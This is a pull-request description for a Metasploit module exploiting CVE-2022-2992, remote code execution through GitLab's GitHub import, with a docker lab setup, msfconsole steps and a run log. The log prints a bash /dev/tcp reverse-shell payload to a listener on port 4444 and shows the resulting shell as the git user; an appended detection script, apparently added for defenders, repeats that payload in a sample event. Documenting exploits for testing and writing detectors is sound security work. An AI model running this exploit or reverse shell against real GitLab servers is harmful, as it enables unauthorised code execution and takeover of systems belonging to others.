
Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import

heyder opened this issue

This module exploits CVE-2022-2992, which allows an authenticated user to achieve remote code execution through the GitHub Import feature on a server running an affected version of GitLab.

Vulnerable Application

docker-compose.yml

services:
  gitlab:
    image: 'gitlab/gitlab-ee:15.3.1-ee.0'
    restart: always
    container_name: gitlab
    hostname: 'gitlab.example'
    network_mode: "bridge"
    ports:
      - '880:80'
      - '8443:443'
    volumes:
      - gitlab_config:/etc/gitlab
      - gitlab_logs:/var/log/gitlab
      - gitlab_data:/var/opt/gitlab
volumes:
  gitlab_config:
    driver: local
  gitlab_logs:
    driver: local
  gitlab_data:
    driver: local

$ docker-compose up

Wait for the container to be "healthy" before continuing. One can use this bash script to monitor the status.

$ # Creating personal access token for the root user
$ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
$ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
$ # Using the personal access token of the root user, create a user.
$ USER=msf
$ PASSWORD=SuperStrongestGitlabPassword
$ curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&[email protected]&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"

Verification

Start an Ngrok tunnel

$ ngrok http 127.0.0.1:4567

Start msfconsole

  • ./msfconsole -q
  • use multi/http/gitlab_github_import_rce_cve_2022_2992
  • set rhosts and rport
  • set USERNAME msf
  • set PASSWORD SuperStrongestGitlabPassword
  • set NGROK_URL
  • set SRVPORT 4567
  • run

Scenarios

Docker container running GitLab 15.3.1

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):

   Name       Current Setting                         Required  Description
   ----       ---------------                         --------  -----------
   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.io  yes       The Ngrok tunnel url
   PASSWORD   12345678                                 yes       The password for the specified username
   Proxies    http:172.25.144.1:8080                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.25.144.1                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      880                                      yes       The target port (TCP)
   SRVHOST    0.0.0.0                                  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    4567                                     yes       The local port to listen on.
   SSL        false                                    no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                                        yes       The base path to the gitlab application
   URIPATH                                             no        The URI to use for this exploit (default is random)
   USERNAME   heyder                                   yes       The username to authenticate as
   VHOST                                               no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting       Required  Description
   ----   ---------------       --------  -----------
   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit

[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
[-] Handler failed to bind to 169.254.192.184:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Using URL: http://host.docker.internal:4567/
[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
[*] Session ID: lbid
[*] Creating group KQPhsIKX
[*] Importing a repository from github
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
[*] Starting interaction with 1...

id
uid=998(git) gid=998(git) groups=998(git)
pwd
/var/opt/gitlab/gitlab-rails/working
exit
[*] Server stopped.
[*] 172.25.144.1 - Command shell session 1 closed.

TODO

  • [x] Create documentation
  • [ ] Ngrok wrapper ?
  • [x] Module should "report" if vulnerable. By doing that the module can act as a "scan", giving the user the chance to check multiple targets and save the results for further actions.
  • [x] Test other payloads - During the tests only the bash payload worked. I won't have time to dig more into this.

heyder, Nov 19 '22 15:11
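The session output above shows what a successful run leaves behind on the host: a `bash` process owned by the `git` service account, started from `/var/opt/gitlab/gitlab-rails/working`, whose command line wires a shell to a `/dev/tcp/` socket. As an added defender-side example (not part of this PR or the module), the following script scores process-execution events for those indicators. The JSON-lines event format with `pid`, `user`, `cwd` and `cmd` fields is an assumption, and the sample events are constructed.

```python
"""Flag reverse-shell style shell launches attributed to the GitLab service account."""
import json
import re
from typing import Iterable

# A bash /dev/tcp redirection such as "exec 151<>/dev/tcp/host/4444" is the
# hallmark of the cmd/unix/reverse_bash payload shown in the module output.
DEV_TCP = re.compile(r"/dev/tcp/[^/\s]+/\d+")
# A shell whose stdin/stdout/stderr are all tied to one numeric fd: "sh <&151 >&151 2>&151".
FD_SHELL = re.compile(r"\b(?:sh|bash)\s+<&\d+\s+>&\d+\s+2>&\d+")
# Context observed in the session: the shell ran as "git" from the Rails working directory.
GITLAB_USER = "git"
GITLAB_WORKDIR = "/var/opt/gitlab/gitlab-rails/working"


def classify(event: dict) -> list[str]:
    """Return the names of every indicator matched by one process event."""
    hits = []
    cmd = event.get("cmd", "")
    if DEV_TCP.search(cmd):
        hits.append("bash_dev_tcp")
    if FD_SHELL.search(cmd):
        hits.append("fd_wired_shell")
    # Only add the context indicator when a payload indicator is already present,
    # so ordinary git operations by the service account are never flagged on their own.
    if hits and event.get("user") == GITLAB_USER and event.get("cwd") == GITLAB_WORKDIR:
        hits.append("gitlab_rails_context")
    return hits


def scan(lines: Iterable[str]) -> list[dict]:
    """Parse JSON-lines process events (assumed format) and return one alert per match."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry rather than abort the scan
        hits = classify(event)
        if hits:
            alerts.append({"pid": event.get("pid"), "user": event.get("user"), "indicators": hits})
    return alerts


# Constructed sample events (not real telemetry): a benign fetch by the git user,
# a benign root shell, a malformed line, and one event modelled on the payload above.
SAMPLE_EVENTS = [
    '{"pid": 4101, "user": "git", "cwd": "/var/opt/gitlab/git-data/repositories", "cmd": "git fetch origin"}',
    '{"pid": 4102, "user": "root", "cwd": "/", "cmd": "/bin/sh -c /usr/bin/gitlab-ctl status"}',
    'not json',
    '{"pid": 4103, "user": "git", "cwd": "/var/opt/gitlab/gitlab-rails/working", "cmd": "bash -c \'0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151\'"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```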